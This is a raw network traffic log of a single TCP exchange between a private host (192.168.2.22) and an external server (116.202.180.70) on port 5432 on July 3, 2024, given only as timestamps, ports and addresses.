Jul 3, 2024 02:22:31.469710112 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.484318018 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.484770060 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.491512060 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.491520882 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.491532087 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.491540909 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.491550922 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.491560936 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.491569996 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.491570950 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.491581917 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.491590977 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.491592884 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.491601944 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.491611958 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.491616011 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.491621971 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.491632938 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.491641045 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.491657972 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.491668940 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.491674900 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.491683960 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.491693974 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.491704941 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.491708040 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.491715908 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.491724968 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.491734982 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.491738081 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.491744041 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.491755009 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.491772890 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.491864920 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.491874933 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.491900921 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.491913080 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.492034912 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.492074013 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.492417097 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.492425919 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.492435932 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.492444992 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.492455006 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.492456913 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.492479086 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.492491961 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.492577076 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.492588043 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.492597103 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.492607117 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.492615938 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.492616892 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.492625952 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.492634058 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.492649078 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.492664099 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.492839098 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.492847919 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.492857933 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.492881060 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.492893934 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.493010998 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.493021965 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.493030071 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.493043900 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.493052959 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.493055105 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.493066072 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.493089914 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.493741989 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.493752003 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.493762016 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.493771076 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.493781090 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.493782043 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.493791103 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.493802071 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.493805885 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.493810892 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.493819952 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.493822098 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.493830919 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.493839025 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.493860960 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.493884087 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.493894100 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.493901968 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.493911982 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.493921995 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.493921995 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.493931055 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.493940115 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.493943930 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.493951082 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.493962049 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.493985891 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.494730949 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.494770050 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.494914055 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.494924068 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.494932890 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.494942904 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.494951963 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.494954109 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.494961977 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.494972944 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.494975090 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.494982004 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.494992971 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.494997978 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.495012999 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.495029926 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.495089054 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.495100021 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.495107889 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.495117903 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.495125055 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.495126963 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.495137930 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.495141029 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.495163918 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.495174885 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.495273113 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.495282888 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.495306969 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.495321989 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.495439053 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.495472908 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.495604038 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.495614052 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.495623112 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.495632887 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.495642900 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.495644093 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.495652914 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.495663881 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.495666981 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.495682955 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.495698929 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.495960951 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.496000051 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.496023893 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.496032953 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.496042967 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.496047974 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.496058941 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.496064901 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.496068001 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.496089935 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.496099949 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.496203899 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.496238947 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.496583939 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.496592999 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.496603966 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.496627092 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.496638060 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.496738911 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.496753931 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.496763945 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.496773005 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.496774912 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.496783018 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.496789932 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.496793985 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.496803999 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.496808052 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.496813059 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.496824026 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.496824026 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.496833086 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.496843100 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.496850014 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.496853113 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.496862888 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.496865034 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.496872902 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.496882915 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.496886015 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.496901989 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.496917963 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.497108936 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.497118950 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.497128010 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.497148037 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.497162104 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.497471094 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.497479916 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.497519016 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.500521898 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.500530958 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.500540972 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.500550032 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.500559092 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.500567913 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.500574112 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.500580072 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.500598907 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.500607967 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.500710011 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.500720024 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.500729084 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.500739098 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.500745058 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.500747919 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.500757933 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.500766039 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.500768900 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.500780106 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.500802994 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.509342909 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.509397030 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.509468079 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.509480000 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.509490013 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.509497881 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.509505987 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.509507895 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.509516001 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.509526968 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.509530067 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.509536028 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.509546995 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.509556055 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.509556055 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.509565115 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.509572029 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.509573936 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.509582996 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.509598017 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.509627104 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.519567013 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.519602060 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.519639015 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.519644022 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.519668102 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.519676924 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.519678116 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.519690037 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.519711018 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.519721031 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.519740105 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.519742966 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.519754887 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.519764900 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.519777060 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.519802094 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.519823074 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.519834042 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.519843102 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.519854069 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.519862890 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.519862890 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.519875050 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.519886971 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.519903898 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.520318985 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.520363092 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.520420074 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.520428896 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.520438910 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.520443916 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.520452976 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.520457983 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.520490885 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.521034956 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.534573078 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.534583092 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.534591913 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.534615993 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.534646034 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.534660101 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.534713984 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.534723997 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.534734011 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.534743071 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.534755945 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.534773111 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.552654982 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.552664995 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.552675009 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.552702904 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.552711010 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.552719116 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.552726984 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.552738905 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.552747965 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.552752018 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.552757025 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.552767038 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.552767992 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.552776098 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.552783012 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.552786112 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.552795887 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.552800894 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.552805901 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.552815914 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.552828074 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.552840948 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.552850962 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.552851915 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.552865028 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.552886009 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.552887917 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.552915096 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.552932024 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.552951097 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.552961111 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.552970886 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.552979946 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.552995920 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.553014040 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.553078890 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.553090096 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.553102016 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.553122997 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.553143978 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.553143978 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.553153992 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.553163052 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.553173065 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.553190947 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.553206921 CEST	49169	5432	192.168.2.22	116.202.180.70
